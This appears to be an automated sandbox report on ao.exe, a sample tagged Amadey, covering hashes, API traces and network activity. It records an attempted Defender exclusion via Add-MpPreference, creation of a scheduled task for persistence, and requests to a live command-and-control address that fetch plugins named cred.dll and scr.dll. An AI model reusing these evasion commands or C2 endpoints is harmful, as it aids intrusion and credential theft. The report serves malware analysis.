popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ao.exe

Amadey Antivirus Code injection HTTP PWS Internet API Http API .NET EXE DLL JPEG Format PE32 PE File AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 May 31, 2021, 11:01 a.m. May 31, 2021, 11:04 a.m.
Size 3.6MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 b1d319888860b7a6400c5e5099d59e48
SHA256 87178907c9c47a383a2a08a30481dbc5345b6c85c48142a855900d9840e6b6da
CRC32 FDE0930B
ssdeep 12288:0DRxaOwYtrsWvNL4RgjWV3ny0qxwCnLRMdgE57lU8SalS11vCmNV3nrOh5A/OYLI:v
Yara
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • Admin_Tool_IN_Zero - Admin Tool Sysinternals
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
185.215.113.38 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:17
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\ao.e
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: xe -Force
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: Waiting for 1
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: seconds, press a key to continue ...
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:17
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\9be4
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: a78dfb\blfte.exe -Force
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: Waiting for 1
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: seconds, press a key to continue ...
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "blfte.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007f7640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007f7740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007f7740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9358
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9c58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9c58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9c58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9c58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9c58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9c58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c97d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c97d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c97d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c9918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c8fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c94d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c94d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c94d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c94d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c94d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c94d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c94d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004c94d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007bc0a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0x4d6376
0x4d58cf
0x4d0ef7
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x727c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x727c1737
mscorlib+0x2d3711 @ 0x6ff13711
mscorlib+0x308f2d @ 0x6ff48f2d
mscorlib+0x2cb060 @ 0x6ff0b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x727c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x727c1737
mscorlib+0x2d36ad @ 0x6ff136ad
mscorlib+0x308f2d @ 0x6ff48f2d
microsoft+0x50c17 @ 0x72460c17
microsoft+0x3f33f @ 0x7244f33f
microsoft+0x3edf8 @ 0x7244edf8
microsoft+0x3e3b9 @ 0x7244e3b9
0x4d025a
0x4d01b6
0x4d0076
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728074ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72807610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72891dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72891e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72891f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7289416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7376f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 8b 01 eb 3e 8d 55 e0 0f b6 01 88 02 0f b6 41 01
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol: mscorlib+0x324f62
exception.address: 0x6ff64f62
registers.esp: 3663236
registers.edi: 3663260
registers.eax: 0
registers.ebp: 3663272
registers.edx: 0
registers.ebx: 116165396
registers.esi: 4194364
registers.ecx: 4194364
1 0 0

__exception__

 stacktrace: 
0x576376
0x5758cf
0x570ef7
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x726c2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x726d264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72741838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72741737
mscorlib+0x2d3711 @ 0x6ef53711
mscorlib+0x308f2d @ 0x6ef88f2d
mscorlib+0x2cb060 @ 0x6ef4b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x726c2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x726d264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72741838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72741737
mscorlib+0x2d36ad @ 0x6ef536ad
mscorlib+0x308f2d @ 0x6ef88f2d
microsoft+0x50c17 @ 0x723d0c17
microsoft+0x3f33f @ 0x723bf33f
microsoft+0x3edf8 @ 0x723bedf8
microsoft+0x3e3b9 @ 0x723be3b9
0x57025a
0x5701b6
0x570076
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x726d264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x726d2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727874ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72787610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72811dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72811e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72811f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7281416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d6f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73717f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73714de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 8b 01 eb 3e 8d 55 e0 0f b6 01 88 02 0f b6 41 01
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol: mscorlib+0x324f62
exception.address: 0x6efa4f62
registers.esp: 4252644
registers.edi: 4252668
registers.eax: 0
registers.ebp: 4252680
registers.edx: 0
registers.ebx: 116421008
registers.esi: 4194364
registers.ecx: 4194364
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.215.113.38/fT5YhO/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.38/fT5YhO/plugins/cred.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.38/fT5YhO/plugins/scr.dll
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.215.113.38//fT5YhO/index.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://185.215.113.38//fT5YhO/index.php?scr=up
request POST http://185.215.113.38/fT5YhO/index.php
request GET http://185.215.113.38/fT5YhO/plugins/cred.dll
request GET http://185.215.113.38/fT5YhO/plugins/scr.dll
request POST http://185.215.113.38//fT5YhO/index.php
request POST http://185.215.113.38//fT5YhO/index.php?scr=up
request POST http://185.215.113.38/fT5YhO/index.php
request POST http://185.215.113.38//fT5YhO/index.php
request POST http://185.215.113.38//fT5YhO/index.php?scr=up
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 1769472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00cf0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00e60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72741000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72742000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 1376256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00392000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0039a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0039c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff48000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02820000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2448
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6d8b1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0268a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2448
